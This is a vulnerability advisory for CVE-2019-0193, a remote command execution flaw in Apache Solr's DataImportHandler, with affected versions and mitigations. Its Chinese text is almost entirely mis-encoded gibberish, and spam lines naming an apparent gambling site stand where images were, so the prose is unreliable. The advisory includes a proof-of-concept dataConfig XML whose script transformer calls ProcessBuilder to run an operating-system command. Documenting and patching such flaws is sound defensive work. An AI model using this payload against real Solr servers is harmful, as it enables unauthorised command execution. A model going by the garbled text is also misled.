Apache SolrÔ¶³ÌÏÂÁîÖ´ÐÐÎó²î´¦Öóͷ£½¨Òé

Ðû²¼Ê±¼ä 2019-08-08

? Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºCVE-2019-0193£¬£¬Î£ÏÕ¼¶±ð£ºÑÏÖØ£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


ÊÜÓ°ÏìµÄ°æ±¾


ÊÊÓÃÓÚSolr < 8.2.0ÇÒ¿ªÆôÁËDataImport¹¦Ð§¡£¡£¡£


Îó²î¸ÅÊö


Apache SolrÊÇÃÀ¹ú°¢ÅÁÆæ£¨Apache£©Èí¼þ»ù½ð»áµÄÒ»¿î»ùÓÚLucene£¨Ò»¿îÈ«ÎÄËÑË÷ÒýÇæ£©µÄËÑË÷ЧÀÍÆ÷¡£¡£¡£¸Ã²úÆ·Ö§³Ö²ãÃæËÑË÷¡¢±ÊÖ±ËÑË÷¡¢¸ßÁÁÏÔʾËÑË÷Ч¹ûµÈ¡£¡£¡£


´Ë´ÎÎó²î·ºÆðÔÚApache SolrµÄDataImportHandler£¬£¬¸ÃÄ£¿£¿£¿£¿£¿éÊÇÒ»¸ö¿ÉÑ¡µ«³£ÓõÄÄ£¿£¿£¿£¿£¿é£¬£¬ÓÃÓÚ´ÓÊý¾Ý¿âºÍÆäËûÔ´ÖÐÌáÈ¡Êý¾Ý¡£¡£¡£


¸ÃÎó²îÔ´ÓÚÓû§ÔÚsolrconfig.xmlÎļþÖÐÉèÖÃÁËDataImportHandler£¬£¬¿ªÆôÁËDataImport¹¦Ð§¡£¡£¡£DataImportHandlerÄ£¿£¿£¿£¿£¿éÔÊÐíÓû§×Ô¼º°üÀ¨¾ç±¾£¬£¬À´¾ÙÐÐÉèÖᣡ£¡£¹¥»÷Õß¿ÉÒÔͨ¹ý½á¹¹¶ñÒâµÄ¾ç±¾½»ÓÉת»»Æ÷¾ÙÐÐÆÊÎö£¬£¬ÔÚSolrÆÊÎöµÄÀú³ÌÖв¢Î´¶ÔÓû§µÄÊäÈë×ö¼ì²é£¬£¬¿Éµ¼Ö¹¥»÷ÕßÔ¶³ÌÔÚSolrЧÀÍÆ÷ÉÏÖ´ÐÐÏÂÁî¡£¡£¡£


Îó²îÑéÖ¤


POC:


<?xml version="1.0" encoding="UTF-8" ?>  
<dataConfig>  
<dataSource name="fromMysql"
     type="JdbcDataSource"  
     driver="com.mysql.jdbc.Driver"  
     url="jdbc:mysql://localhost:3306/mysql"  
     user="root"  
     password="123456"/>
<script ><![CDATA[
   function f2c(row) {
      var x=new java.lang.ProcessBuilder;x.command("open","/");org.apache.commons.io.IOUtils.toString(x.start().getInputStream());
     return row;
   }
   ]]>
 </script>  
<document>  
 <entity name="Users" query="SELECT 1" transformer="script:f2c">
 </entity>  
</document>  
</dataConfig>


»á¼ûurl:http://ip:8983/solr/#/core1/dataimport//dataimport£¬£¬±£´æÕâ¸ö·¾¶£¬£¬¾Í֤ʵÓû§µÄsolr£¬£¬ÓпÉѡģ¿£¿£¿£¿£¿éDataImportHandler£¬£¬±£´æÎó²îʹÓÃΣº¦¡£¡£¡£Ïê¼ûÏÂͼ£º

 

ÄϹ¬NGÓéÀÖ(Öйú)¹Ù·½ÍøÕ¾


¸ÃÎó²îÓ°Ïì°æ±¾Solr < 8.2.0£¬£¬ÔÚDashboardÒ³Ãæ¿ÉÒÔÉó²ésolrµÄ°æ±¾£¬£¬Ïê¼ûÏÂͼ£º

 

ÄϹ¬NGÓéÀÖ(Öйú)¹Ù·½ÍøÕ¾


ÐÞ¸´½¨Òé


½«Apache SolrÉý¼¶ÖÁ8.2.0»ò¸ü¸ßµÄ°æ±¾¡£¡£¡£


ÔÝʱÐÞ¸´½¨Ò飺


1¡¢ ±à¼­solrconfig.xml£¬£¬½«ËùÓÐÓÃÀο¿ÖµÉèÖõÄDataImportHandlerÓ÷¨ÖеÄdataConfig²ÎÊýÉèÖÃΪ¿Õ×Ö·û´®£»£»£»£»£»

 

ÄϹ¬NGÓéÀÖ(Öйú)¹Ù·½ÍøÕ¾


2¡¢È·±£ÍøÂçÉèÖÃÖ»ÔÊÔÊÐíÐŵÄÁ÷Á¿ÓëSolr¾ÙÐÐͨѶ£¬£¬ÌØÊâÊÇÓëDIHÇëÇó´¦Öóͷ£³ÌÐòµÄͨѶ¡£¡£¡£


²Î¿¼Á´½Ó


https://issues.apache.org/jira/browse/SOLR-13669